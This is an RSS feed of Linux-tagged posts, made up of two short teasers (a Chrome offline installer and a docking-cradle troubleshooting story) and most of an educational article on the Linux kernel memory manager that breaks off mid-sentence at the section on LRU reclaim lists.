<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss.xsl" media="all"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>Roastidio.us Tagged with linux</title>
<link>https://roastidio.us/tag/2428</link>
<atom:link href="https://roastidio.us/tagged_with/linux" rel="self" type="application/rss+xml"></atom:link>
<description>Roastidio.us Tagged with linux</description>
<item>
<title>Google Chrome Offline Installer: Direct Download Links</title>
<link>https://webtrickz.com/google-chrome-offline-installer-download/</link>
<guid isPermaLink="false">4ZJvmMR0ZUlhGB__pjPmWScHuwj8iymKGxjO-w==</guid>
<pubDate>Thu, 25 Jun 2026 13:57:28 +0000</pubDate>
<description>Google Chrome is the world’s most popular web browser, but installing it isn’t always straightforward, especially when the online installer requires a stable internet connection. That’s where the offline setup file comes in handy. It includes all the files needed to install Chrome without downloading additional data during installation. In this guide, we cover how […] The post Google Chrome Offline Installer: Direct Download Links appeared first on WebTrickz.</description>
<content:encoded>&lt;p&gt;Google Chrome is the world’s most popular web browser, but installing it isn’t always straightforward, especially when the online installer requires a stable internet connection. That’s where the offline setup file comes in handy. It includes all the files needed to install Chrome without downloading additional data during installation. In this guide, we cover how […]&lt;/p&gt;&lt;p&gt;The post &lt;a href=&quot;https://webtrickz.com/google-chrome-offline-installer-download/&quot;&gt;Google Chrome Offline Installer: Direct Download Links&lt;/a&gt; appeared first on &lt;a href=&quot;https://webtrickz.com&quot;&gt;WebTrickz&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Beware the Cradle</title>
<link>https://www.logikalsolutions.com/wordpress/information-technology/cradle/</link>
<guid isPermaLink="false">kGNoZU_qWXVAbGdaiWD986k927LQBQ11QojQ3A==</guid>
<pubDate>Thu, 25 Jun 2026 06:07:59 +0000</pubDate>
<description>You know, a cradle can be the greatest thing on earth. It can also cost you days. A few days ago, when I was trying to determine just how weak the power supply in my HP Franken-Z, it cost me days. The machine is running Linux Mint Mate edition. When I tried to stick in the NVS video card it couldn’t get powered on far enough to show me the logo screen. Just kept re-booting, … Beware the CradleRead more The post Beware the Cradle appeared first on Logikal Blog.</description>
<content:encoded>&lt;p&gt;You know, a cradle can be the greatest thing on earth. It can also cost you days. A few days ago, when I was trying to determine just how weak the power supply in my HP Franken-Z, it cost me days. The machine is running Linux Mint Mate edition. When I tried to stick in the NVS video card it couldn’t get powered on far enough to show me the logo screen. Just kept re-booting, … &lt;a href=&quot;https://www.logikalsolutions.com/wordpress/information-technology/cradle/&quot;&gt;&lt;span&gt;Beware the Cradle&lt;/span&gt;Read more&lt;/a&gt;&lt;/p&gt;&lt;p&gt;The post &lt;a href=&quot;https://www.logikalsolutions.com/wordpress/information-technology/cradle/&quot;&gt;Beware the Cradle&lt;/a&gt; appeared first on &lt;a href=&quot;https://www.logikalsolutions.com/wordpress&quot;&gt;Logikal Blog&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Memory Manager | Internals for Interns</title>
<link>https://internals-for-interns.com/posts/linux-kernel-memory-manager/</link>
<enclosure type="image/jpeg" length="0" url="https://internals-for-interns.com/images/linux-header.webp"></enclosure>
<guid isPermaLink="false">wOfJK3ikuPFSPfdBVy5n48keBxF_XsXa-4hHfA==</guid>
<pubDate>Wed, 24 Jun 2026 13:20:27 +0000</pubDate>
<description>In the previous article we looked at how a user program crosses the ring 3 → ring 0 boundary to ask the kernel for help. The example we used was read() — a file descriptor, a buffer pointer, a byte count. But we glossed over something important: what is that buffer? Who decided it existed? Who owns the physical RAM behind it? Those questions are what the memory manager answers. And it answers them for every process on the machine, simultaneously, for every allocation that has ever happene...</description>
<content:encoded>&lt;p&gt;In the &lt;a href=&quot;https://internals-for-interns.com/posts/linux-kernel-syscalls/&quot;&gt;previous article&lt;/a&gt;
we looked at how a user program crosses the ring 3 → ring 0 boundary to ask the kernel for help. The example we used was &lt;code&gt;read()&lt;/code&gt; — a file descriptor, a buffer pointer, a byte count. But we glossed over something important: what &lt;em&gt;is&lt;/em&gt; that buffer? Who decided it existed? Who owns the physical RAM behind it?&lt;/p&gt;&lt;p&gt;Those questions are what the memory manager answers. And it answers them for every process on the machine, simultaneously, for every allocation that has ever happened since boot. It’s one of the most complex subsystems in the kernel, so I want to approach it the way you’d approach an unfamiliar library — start at the front desk with the catalog, then walk back through the stacks.&lt;/p&gt;&lt;h2&gt;A Metaphor to Carry Us Through&lt;/h2&gt;&lt;p&gt;Here’s the mental model I want you to hold onto: &lt;strong&gt;think of memory management as an enormous public library in your town.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;The library has one vast collection of physical &lt;strong&gt;shelves&lt;/strong&gt;, and every shelf is identical: one shelf is a &lt;strong&gt;page frame&lt;/strong&gt; — 4 KB of physical RAM. There’s a fixed number of them: on a machine with 16 GB of RAM, about four million shelves, and that’s all you’ll ever have. This is the real, finite, physical stuff.&lt;/p&gt;&lt;p&gt;Now the trick. No reader ever walks the shelves directly. Instead, the reader goes to the library’s &lt;strong&gt;service desk&lt;/strong&gt; and asks for an entry by its number. The desk keeps &lt;strong&gt;a private catalog for every reader&lt;/strong&gt; — a personal set of index cards — and looks yours up to find where the entry really lives. A card says “the thing you call entry #5,000 lives on physical shelf 19.” Two different readers can both have a card numbered #5,000, and those cards can point at completely different shelves — or, sometimes, deliberately at the &lt;em&gt;same&lt;/em&gt; shelf.&lt;/p&gt;&lt;p&gt;With that in mind, let’s go from the ground up. We start with the hardware.&lt;/p&gt;&lt;h2&gt;The MMU and Page Tables&lt;/h2&gt;&lt;p&gt;Remember the service desk: you hand it an entry number, it looks the entry up in your catalog, and it tells you the real shelf the data sits on — and it does this for every single thing you ask for. That desk is real hardware, the &lt;strong&gt;MMU&lt;/strong&gt; (Memory Management Unit), and the catalog it reads is a tree of kernel-managed tables called &lt;strong&gt;page tables&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Now the concepts behind the metaphor. Every time an application touches memory — reading a variable, calling a function, fetching a string — it uses a &lt;em&gt;virtual&lt;/em&gt; address (the entry number you hand the desk), and that address never reaches the RAM chips directly. The MMU has to translate it into the physical address where the data actually lives, and to do that it walks the process’s page tables. The kernel writes the cards; the MMU reads them, billions of times a second.&lt;/p&gt;&lt;p&gt;But the library has a catalog for every reader — how does the MMU know it’s &lt;em&gt;your&lt;/em&gt; application’s catalog it should be reading, and not someone else’s? From the &lt;strong&gt;&lt;code&gt;CR3&lt;/code&gt; register&lt;/strong&gt;. (&lt;code&gt;CR3&lt;/code&gt; is the x86-64 name; other architectures use a different register for the same job — &lt;code&gt;TTBR0_EL1&lt;/code&gt; on ARM64, &lt;code&gt;satp&lt;/code&gt; on RISC-V — but the idea is identical.) &lt;code&gt;CR3&lt;/code&gt; holds the physical address of the root of your process’s page table tree — its &lt;strong&gt;PGD (Page Global Directory)&lt;/strong&gt; — and that root is the single thing that points at your exclusive catalog and defines what memory belongs to you. On every context switch, the kernel just reloads &lt;code&gt;CR3&lt;/code&gt; with the next process’s PGD, swapping in a completely different catalog: from that instant the same virtual addresses resolve to entirely different physical memory.&lt;/p&gt;&lt;p&gt;That catalog isn’t one giant flat table — that would be impossibly large. It’s a tree of nested drawers, and on modern x86-64 with 5-level paging the tree is five levels deep: &lt;strong&gt;PGD → P4D → PUD → PMD → PTE&lt;/strong&gt;. (Most x86-64 machines actually run just &lt;em&gt;four&lt;/em&gt; levels — PGD → PUD → PMD → PTE, with the P4D folded away — since 5-level paging needs both newer hardware and a kernel built for it; but five is the general case, and the extra level changes nothing about how the walk works.) The clever part is that the virtual address &lt;em&gt;itself&lt;/em&gt; tells the MMU which drawer to open at each level. The hardware slices the address into six pieces — one index per level, plus a final offset. Say our process reads from:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://internals-for-interns.com/images/linux-kernel-memory-diagram-1.webp&quot; alt=&quot;Diagram slicing the virtual address 0x0005A0320C82A000 into its six fields: the PGD, P4D, PUD, PMD and PTE indexes (9 bits each) plus the 12-bit offset within the page&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Each index is 9 bits — exactly enough to pick one of 512 entries (2⁹ = 512), because every drawer is a single 4 KB page holding 512 entries of 8 bytes (64 bits) each (512 × 8 = 4096). The trailing 12 bits aren’t an index at all; they’re the offset &lt;em&gt;inside&lt;/em&gt; the final page (2¹² = 4096, our 4 KB page size).&lt;/p&gt;&lt;p&gt;Now the walk. The MMU starts at the PGD that &lt;code&gt;CR3&lt;/code&gt; points to, uses the first index (5) to pick an entry, and that entry hands it the physical address of the next drawer down. It uses the next index (320) to pick an entry &lt;em&gt;there&lt;/em&gt;, which points to the next drawer, and so on, one level at a time:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://internals-for-interns.com/images/linux-kernel-memory-diagram-2.webp&quot; alt=&quot;Diagram of the five-level page table walk starting from CR3: each level (PGD, P4D, PUD, PMD, PTE) uses one index from the virtual address to pick an entry that points to the next drawer down, ending at the page frame @ 0x8E33000&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;You might wonder why those entry values look like &lt;code&gt;0x3A05007&lt;/code&gt; instead of a clean &lt;code&gt;0x3A05000&lt;/code&gt;. Since every drawer is page-aligned, the low 12 bits of any next-drawer address are always zero — so the kernel borrows them to stash a handful of &lt;strong&gt;permission bits&lt;/strong&gt; describing what you’re allowed to do with whatever the entry points to: whether the page is writable, whether it’s actually in RAM right now, whether user-space is allowed to reach it, whether code can be executed from it. That trailing &lt;code&gt;0x007&lt;/code&gt;, for instance, just means present, writable, and user-accessible. These bits are also how memory protection is enforced — a code page leaves the writable bit cleared so you can’t overwrite your own instructions, a stack page is marked no-execute so injected machine code won’t run. (They’re all defined in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/arch/x86/include/asm/pgtable_types.h#L10&quot;&gt;&lt;code&gt;arch/x86/include/asm/pgtable_types.h&lt;/code&gt;&lt;/a&gt;.)&lt;/p&gt;&lt;p&gt;The entry at the bottom — the &lt;strong&gt;PTE (Page Table Entry)&lt;/strong&gt; — is the one that finally names a real &lt;strong&gt;page frame&lt;/strong&gt;: 4 KB of physical RAM (one shelf in our library). The MMU takes that frame address and adds the 12-bit offset it set aside at the very start, and &lt;em&gt;that&lt;/em&gt; is the physical address it reads from memory — the exact byte our virtual address was pointing at all along:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;physical = 0x8E33000 + 0x000 = 0x8E33000&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Five lookups to turn one virtual address into one physical address. (The CPU caches recent translations in a small buffer called the &lt;strong&gt;TLB&lt;/strong&gt; so it doesn’t repeat this walk on every access; and the &lt;strong&gt;L1/L2/L3 caches&lt;/strong&gt; keep recently-used data close to the CPU so it doesn’t hit RAM every time. We won’t cover either here.)&lt;/p&gt;&lt;p&gt;Now that we have a physical address, we can go to the right place to fetch the information — but who keeps track of which pages are occupied, which are free, and what hardware rules apply to each? That’s what the physical layer is for.&lt;/p&gt;&lt;h2&gt;Shelves, Wings and the Shelf Registry&lt;/h2&gt;&lt;p&gt;The library keeps a registry with one entry describing the state of every single shelf. The kernel does exactly this: for every 4 KB page frame in the machine there’s one small record, called a &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L79&quot;&gt;&lt;code&gt;struct page&lt;/code&gt;&lt;/a&gt;. Conceptually, you can think of those records as a registry indexed by the page’s serial number, its &lt;strong&gt;PFN (Page Frame Number)&lt;/strong&gt;: give the kernel a PFN, and it can find the corresponding &lt;code&gt;struct page&lt;/code&gt; through its memmap/vmemmap machinery. On a machine with 16 GB of RAM, that’s over four million records.&lt;/p&gt;&lt;p&gt;Each record only holds the essentials the kernel needs to manage that one page. It knows whether the page is free or in use. It keeps a reference count — how many parts of the system are still relying on that page — so the kernel can tell when nobody needs it anymore and it’s safe to reclaim. It remembers what the page is backing, whether that’s a piece of a file’s cached contents or anonymous memory like a process’s heap or stack, and how many page tables are pointing at it, which matters when a page is shared between several processes. And it carries a few status flags: is the page dirty (written to but not yet saved to disk), is it locked, is it being written back right now. That handful of fields, multiplied across all four million pages, is enough for the kernel to track the life of every piece of physical memory in the machine.&lt;/p&gt;&lt;p&gt;One modern wrinkle worth flagging before we move on: the kernel increasingly manages shelves not one at a time but in shrink-wrapped bundles of adjacent ones called &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L401&quot;&gt;&lt;strong&gt;folios&lt;/strong&gt;&lt;/a&gt; — a single index card for a whole run of pages, so a larger file chunk or a huge page can be tracked, reclaimed, and moved as one unit instead of page by page. In fact, most of the bookkeeping just described (the reference count, the dirty/locked flags, what the page is backing, its place on the reclaim lists we’ll meet later) lives on the folio now, with &lt;code&gt;struct page&lt;/code&gt; itself being slimmed down. We’ll keep saying “page” throughout for clarity, but &lt;em&gt;folio&lt;/em&gt; is the word you’ll run into all over current kernel source — just read it as “one or more pages handled together.” We won’t cover it further here.&lt;/p&gt;&lt;p&gt;That registry treats every page the same way, but the hardware underneath doesn’t — some come with strings attached.&lt;/p&gt;&lt;h3&gt;Zones: Pages With Special Rules&lt;/h3&gt;&lt;p&gt;Not all pages are equally usable by everyone. Picture a delivery courier whose cart only reaches the lowest shelves — anything that courier handles has to be placed down low, never on the upper floors. Physical RAM has the same kind of quirk: some old devices can only do DMA (Direct Memory Access) into the lowest 16 MB of memory, and some 32-bit devices can’t address anything above 4 GB. To keep track of these constraints, the kernel splits RAM into &lt;strong&gt;zones&lt;/strong&gt; — a low zone for those restricted devices, a &lt;em&gt;normal&lt;/em&gt; zone where the vast majority of allocations land, and a few special-purpose ones. Most of the time everything comes from the normal zone; the restricted zones only matter when a driver specifically needs low-address memory.&lt;/p&gt;&lt;p&gt;Zones sort pages by what they’re &lt;em&gt;allowed&lt;/em&gt; to do; a second dimension matters just as much — &lt;em&gt;where&lt;/em&gt; in the machine a page physically sits.&lt;/p&gt;&lt;h3&gt;NUMA Nodes: Different Wings, Different Walks&lt;/h3&gt;&lt;p&gt;Picture the library spread across several wings. Books in your own wing are a short walk away; fetching one from a distant wing means a long trek down the corridor. On multi-socket machines, RAM is physically attached to different CPU sockets in just this way. A CPU reading from RAM attached to its own socket is fast (local access); reading from another socket’s RAM is slower (remote access). The kernel models this with &lt;strong&gt;NUMA (Non-Uniform Memory Access) nodes&lt;/strong&gt;, each with its own set of zones. That’s why, whenever it can, it tries to satisfy an allocation from the node’s local memory and dodge the remote-access penalty; on a single-socket machine the question doesn’t even come up, since there’s only one node.&lt;/p&gt;&lt;p&gt;Now we know how the pages are organized — so how does the library actually hand them out?&lt;/p&gt;&lt;h2&gt;The Buddy Allocator — Reserving Runs of Pages&lt;/h2&gt;&lt;p&gt;The librarians don’t just give out one page at a time. They keep their free space organized as &lt;em&gt;runs&lt;/em&gt; of adjacent empty pages, and when you ask for space they find a run of the right length — splitting a long run in half when a shorter one will do, and gluing two short runs back together when both come free. That’s the &lt;strong&gt;buddy allocator&lt;/strong&gt;, implemented in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/page_alloc.c&quot;&gt;&lt;code&gt;mm/page_alloc.c&lt;/code&gt;&lt;/a&gt; (~7,800 lines). It manages free physical pages in lists grouped by &lt;strong&gt;order&lt;/strong&gt;, where order &lt;em&gt;n&lt;/em&gt; means a block of 2ⁿ contiguous pages:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Order 0: 4 KB (1 page)&lt;/li&gt;&lt;li&gt;Order 1: 8 KB (2 pages)&lt;/li&gt;&lt;li&gt;Order 2: 16 KB (4 pages)&lt;/li&gt;&lt;li&gt;…&lt;/li&gt;&lt;li&gt;Order 10: 4 MB (1,024 pages)&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;When the kernel wants to allocate a 16 KB block (order 2), the buddy allocator looks at the order-2 free list. If there’s a run there, it takes it. If not, it grabs an order-3 block (32 KB), splits it in half — the two halves are &lt;em&gt;buddies&lt;/em&gt;, adjacent runs of pages — hands one back, and puts the other on the order-2 list. When the block is later freed, the allocator checks if its buddy is also free; if so, it glues them back into a longer run. This merging keeps large contiguous stretches of memory available for things like huge pages and DMA buffers.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://internals-for-interns.com/images/linux-kernel-memory-diagram-3.webp&quot; alt=&quot;Diagram of the buddy allocator: free runs grouped by order (order n = 2ⁿ pages), the SPLIT path borrowing an order-3 block and cutting it into two buddies, and the MERGE path gluing two free buddies back into one larger run&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Splitting and gluing runs keeps fragmentation in check, but there’s still one bottleneck left on the fast path: the lock itself.&lt;/p&gt;&lt;h3&gt;Per-CPU Caches: Skipping the Lock&lt;/h3&gt;&lt;p&gt;The buddy allocator protects its free lists with a zone lock — think of it as needing the head librarian’s key every time you touch the shelf registry. Taking that lock on every single allocation would be a bottleneck in a system with hundreds of CPUs. So each CPU has a small &lt;strong&gt;Per-CPU Page cache (PCP)&lt;/strong&gt; — a personal cache of pre-allocated pages (mostly single pages, plus a few small runs) that the CPU can give out and take back without bothering the head librarian for the common case. The PCP is defined in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mmzone.h#L744&quot;&gt;&lt;code&gt;include/linux/mmzone.h&lt;/code&gt;&lt;/a&gt; and refills from the buddy allocator in batches when it runs low.&lt;/p&gt;&lt;p&gt;The buddy allocator deals in whole pages, but most of what the kernel needs is far smaller — so the next layer up is built to carve those pages into something finer-grained.&lt;/p&gt;&lt;h2&gt;Kernel Allocators — Specialized Drawers&lt;/h2&gt;&lt;p&gt;The structures the kernel needs room for are its &lt;em&gt;own&lt;/em&gt; small internal records — the bookkeeping it uses to run the system, which lives entirely inside the kernel and never in user space. Handing over an entire 4 KB page for a 64-byte structure is like dedicating a whole shelf to a single sticky note, wasting 4,032 bytes. The answer is a &lt;strong&gt;slab allocator&lt;/strong&gt;: a &lt;em&gt;slab&lt;/em&gt; is a page (or a few pages) grabbed once from the buddy allocator and dedicated to objects of one single size, lined up side by side like books of equal height on a shelf. A request for a 64-byte object simply hands back the next free spot instead of burning a whole page on it — one shelf, many identical books.&lt;/p&gt;&lt;h3&gt;SLUB: The Default Kernel Object Allocator&lt;/h3&gt;&lt;p&gt;Linux uses &lt;strong&gt;SLUB&lt;/strong&gt; (implemented in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/slub.c&quot;&gt;&lt;code&gt;mm/slub.c&lt;/code&gt;&lt;/a&gt;) as its default slab allocator. To organize all this, SLUB groups slabs into &lt;strong&gt;caches&lt;/strong&gt;: a cache is the whole set of slabs dedicated to one kind of book — objects of a single specific size, like a &lt;code&gt;task_struct&lt;/code&gt; or an &lt;code&gt;inode&lt;/code&gt;. So there’s a cache for &lt;code&gt;task_struct&lt;/code&gt;s, another for &lt;code&gt;inode&lt;/code&gt;s, and so on for every kind of structure; each one manages its own collection of &lt;strong&gt;slabs&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;When you call &lt;code&gt;kmalloc(size, GFP_KERNEL)&lt;/code&gt;, SLUB rounds the request up to one of a handful of size classes (8, 16, 32, 64, 96, 128, … bytes) and goes to the cache for that class. And here’s the key detail: each cache keeps a small &lt;em&gt;per-CPU stash of free objects&lt;/em&gt;. So when your code asks for a 64-byte object, the CPU it’s running on can usually take the next one straight from its own stash without touching a shared global list. Only when that stash runs empty does SLUB take the slow path, refilling it from the cache’s slabs — and grabbing a fresh slab (a new page with room for more objects) from the buddy allocator when those run out too. (In kernel code this per-CPU layer is called &lt;em&gt;sheaves&lt;/em&gt;, backed by a per-NUMA-node structure called a &lt;em&gt;barn&lt;/em&gt; that shuffles objects between CPUs as some run low and others pile up. Don’t worry about the names; the point is the idea: each CPU pulls from its own stash, so in the common case nobody has to compete for a shared global resource.)&lt;/p&gt;&lt;p&gt;If this sounds familiar, it’s because it’s similar to the trick the Go runtime’s allocator uses. Go gives every &lt;code&gt;P&lt;/code&gt; (its scheduling processor) a private &lt;code&gt;mcache&lt;/code&gt; holding one &lt;code&gt;mspan&lt;/code&gt; per size class, each span carved into fixed-size slots — so a goroutine can grab small objects without ever touching a global lock. Same idea, different runtime; I went through it in detail in &lt;a href=&quot;https://internals-for-interns.com/posts/go-memory-allocator/&quot;&gt;The Memory Allocator&lt;/a&gt;
.&lt;/p&gt;&lt;p&gt;SLUB tackles objects &lt;em&gt;smaller&lt;/em&gt; than a page. The opposite problem — needing a buffer bigger than any contiguous run the buddy allocator can spare — calls for a different trick.&lt;/p&gt;&lt;h3&gt;vmalloc: When Physical Contiguity Isn’t Needed&lt;/h3&gt;&lt;p&gt;The buddy allocator hands out physically &lt;em&gt;contiguous&lt;/em&gt; runs of pages. For large allocations this gets harder and harder as memory fragments over time. But sometimes you just need a big buffer and don’t care whether the backing pages are next to each other in physical memory.&lt;/p&gt;&lt;p&gt;That’s what &lt;code&gt;vmalloc()&lt;/code&gt; is for (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/vmalloc.c&quot;&gt;&lt;code&gt;mm/vmalloc.c&lt;/code&gt;&lt;/a&gt;). It grabs individual pages from the buddy allocator wherever they happen to be free, then sets up a run of &lt;em&gt;consecutive page-table entries&lt;/em&gt; that point at those scattered pages. The pages are spread all over the building, but to the code using the buffer it looks like one unbroken range.&lt;/p&gt;&lt;p&gt;The downside: if what you really need, for hardware reasons, is a single physically contiguous block of memory (a DMA buffer, say), this won’t do.&lt;/p&gt;&lt;p&gt;Buddy, SLUB and vmalloc are all about the kernel feeding its &lt;em&gt;own&lt;/em&gt; appetite for memory. A user-space process gets its memory through a different layer entirely — one built on top of everything we’ve seen.&lt;/p&gt;&lt;h2&gt;Virtual Memory for Processes — The Address Space and Its Regions&lt;/h2&gt;&lt;p&gt;Here’s the key idea. The page tables we saw earlier only record what’s &lt;em&gt;actually&lt;/em&gt; mapped at this instant. But a process’s address space is mostly &lt;strong&gt;promises&lt;/strong&gt;: huge ranges of addresses the process is &lt;em&gt;allowed&lt;/em&gt; to use, but that aren’t backed by any physical memory yet. The page tables can’t represent those promises, so the kernel keeps a separate, higher-level picture of what each process’s memory is &lt;em&gt;supposed&lt;/em&gt; to look like.&lt;/p&gt;&lt;p&gt;That picture starts with one record per process, its &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L1123&quot;&gt;&lt;code&gt;mm_struct&lt;/code&gt;&lt;/a&gt; — the single master description of that process’s entire view of memory. It points at the process’s page tables and tracks the broad layout, but mostly it’s a container for the regions the address space is divided into.&lt;/p&gt;&lt;p&gt;Those regions are where the real detail lives. Each one is a &lt;strong&gt;VMA (Virtual Memory Area)&lt;/strong&gt; (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/include/linux/mm_types.h#L913&quot;&gt;&lt;code&gt;struct vm_area_struct&lt;/code&gt;&lt;/a&gt;): a contiguous range of addresses that all share the same rules. For our purposes, the important pieces of a VMA are the range of addresses it covers, the permissions on that range (read, write, execute, and whether it’s shared), and what’s behind it: a specific file it was mapped from, or nothing at all, in which case it’s &lt;em&gt;anonymous&lt;/em&gt; memory like the heap or the stack. A typical process is just a handful of these stitched together — one for its code, one for its data, one for the heap, one for the stack, and more for each shared library or mapped file. You can list them for any running process with &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/maps&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;But a VMA is still just a promise — a labeled range with rules and nothing behind it. The moment a process actually reaches into one of those addresses, that promise has to be turned into real memory, and that’s the job of the page fault.&lt;/p&gt;&lt;h2&gt;Page Faults — The Librarian Who Fetches on Demand&lt;/h2&gt;&lt;p&gt;When you call &lt;code&gt;malloc()&lt;/code&gt; and the C library asks the kernel for memory, the kernel usually hands back a virtual address range without allocating any physical pages yet. The address range exists, but no page is shelved and nothing in the page tables points anywhere yet.&lt;/p&gt;&lt;p&gt;The first time your code actually &lt;em&gt;reads or writes&lt;/em&gt; that memory, the CPU tries to translate the address, finds nothing in the page tables for it, and raises a &lt;strong&gt;#PF (page fault) exception&lt;/strong&gt; — the reader has opened an entry with no book behind it. This is the bell that summons the librarian: the CPU jumps into the kernel’s fault handler (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/arch/x86/mm/fault.c#L1462&quot;&gt;&lt;code&gt;handle_page_fault()&lt;/code&gt;&lt;/a&gt;).&lt;/p&gt;&lt;p&gt;The handler’s job is to figure out what &lt;em&gt;should&lt;/em&gt; be at that address and make it so. First it finds the VMA covering the faulting address. If there isn’t one, or the access breaks the VMA’s permissions (writing to read-only memory, say), that’s a genuine bug and the process gets a &lt;code&gt;SIGSEGV&lt;/code&gt;. Otherwise the kernel looks at &lt;em&gt;what’s missing&lt;/em&gt; and reacts accordingly: if nothing was ever mapped there, it provides a fresh blank page — or, for a file-backed region, reads the right chunk of the file in. (There’s one neat shortcut: the very first access to anonymous memory is often a &lt;em&gt;read&lt;/em&gt;, and a read of a page that should just be zeros doesn’t need its own allocation at all — the kernel points it at a single shared, read-only &lt;strong&gt;zero page&lt;/strong&gt;, and only allocates a real page once you actually write.)&lt;/p&gt;&lt;p&gt;This lazy approach — &lt;strong&gt;demand paging&lt;/strong&gt; — is why a process that allocates 1 GB but only uses 10 MB doesn’t consume 1 GB of RAM. The kernel only builds what the process actually touches.&lt;/p&gt;&lt;p&gt;Demand paging keeps a fresh allocation cheap. A closely related trick keeps &lt;em&gt;copying&lt;/em&gt; an entire address space cheap too.&lt;/p&gt;&lt;h3&gt;Copy-on-Write: Photocopy When You Annotate&lt;/h3&gt;&lt;p&gt;When a process calls &lt;code&gt;fork()&lt;/code&gt;, the child gets its own address space that starts as an exact copy of the parent’s. Actually copying all that memory would be slow and wasteful. It’d be like photocopying every book a reader owns just so a second reader can have a set they’ll probably never write in.&lt;/p&gt;&lt;p&gt;So the kernel cheats. With &lt;strong&gt;Copy-on-Write (CoW)&lt;/strong&gt;, parent and child simply &lt;em&gt;share&lt;/em&gt; the same physical pages, but every writable private page is marked read-only in both. As long as both only ever read, nothing else has to happen — they read the same books side by side.&lt;/p&gt;&lt;p&gt;The trick springs the moment either one tries to write. The CPU faults on the read-only page, and only &lt;em&gt;then&lt;/em&gt; does the kernel make a private copy: it grabs a fresh page, copies the contents across, and repoints that process’s page-table entry at the new, writable version. The other process keeps using the original, undisturbed. Each side ends up with its own copy of only the pages it actually changed.&lt;/p&gt;&lt;p&gt;Demand paging and copy-on-write are both about filling in a region that already exists. But all along we’ve taken those regions for granted — so let’s back up and see how one gets created in the first place.&lt;/p&gt;&lt;h2&gt;mmap — Claiming a Range of Addresses&lt;/h2&gt;&lt;p&gt;So where do VMAs actually come from? Most of them come from &lt;code&gt;mmap()&lt;/code&gt;. You can think of &lt;code&gt;mmap()&lt;/code&gt; as the call that says “give me a region of address space, and remember what it’s for” — and what it produces, under the hood, is a new VMA. The work happens in &lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/mmap.c#L336&quot;&gt;&lt;code&gt;do_mmap()&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;The kernel doesn’t have to do much here. It rounds your requested size up to a whole number of pages, turns the protections you asked for (&lt;code&gt;PROT_READ&lt;/code&gt;, &lt;code&gt;PROT_WRITE&lt;/code&gt;, &lt;code&gt;PROT_EXEC&lt;/code&gt;) into the new region’s permissions, and finds a free gap in the address space big enough to hold it. Then it creates the VMA describing that range and adds it to the process’s set of regions. If you’re mapping a file, it also notes &lt;em&gt;which&lt;/em&gt; file backs the region, so that a later page fault knows where to fetch the contents from.&lt;/p&gt;&lt;p&gt;And for an ordinary lazy mapping, that’s it — &lt;code&gt;mmap()&lt;/code&gt; returns. Notice what &lt;em&gt;didn’t&lt;/em&gt; happen: no physical memory was handed out and no page tables were filled in. All &lt;code&gt;mmap()&lt;/code&gt; did was reserve a range of addresses and write down the rules for it. The actual pages show up later, one page fault at a time, the first time you touch them. Some mappings ask the kernel to do more up front — &lt;code&gt;MAP_POPULATE&lt;/code&gt;, locked mappings, huge pages, and some device mappings are examples — but lazy mappings are the normal case to keep in mind.&lt;/p&gt;&lt;p&gt;This is also, indirectly, how &lt;code&gt;malloc()&lt;/code&gt; works. When the C library needs more room, it asks the kernel for raw address space — either with &lt;code&gt;brk()&lt;/code&gt;, which simply moves the top of the heap, or with an anonymous &lt;code&gt;mmap()&lt;/code&gt; — and then hands out small pieces of that range to your program on its own. From the kernel’s point of view there’s no such thing as &lt;code&gt;malloc&lt;/code&gt;: there’s just a request for address space, followed by page faults as the program starts using it.&lt;/p&gt;&lt;p&gt;Every mechanism so far has been about &lt;em&gt;handing memory out&lt;/em&gt; — reserving ranges, faulting pages in, sharing them between processes. Eventually, though, the machine runs out of room, and the kernel has to start taking pages &lt;em&gt;back&lt;/em&gt;.&lt;/p&gt;&lt;h2&gt;Memory Pressure: When the Shelves Fill Up&lt;/h2&gt;&lt;p&gt;The shelves are finite, so sooner or later they fill up. When that happens, the library does what a real library does with books nobody has opened in years: it boxes them up and ships them to an &lt;strong&gt;off-site annex&lt;/strong&gt;, freeing the shelf for something people actually want. The annex is &lt;strong&gt;swap&lt;/strong&gt; — disk space the kernel keeps around as overflow — and the worker running the operation is &lt;strong&gt;kswapd&lt;/strong&gt;, a kernel thread that wakes up whenever free memory runs low and quietly reclaims pages until there’s breathing room again.&lt;/p&gt;&lt;p&gt;So how does kswapd decide &lt;em&gt;which&lt;/em&gt; books to box up? It goes after the coldest ones — pages nobody has touched in a while. To keep track of which those are, the kernel files pages on &lt;strong&gt;LRU (Least Recently Used) lists&lt;/strong&gt;: an &lt;em&gt;active&lt;/em&gt; list for pages in 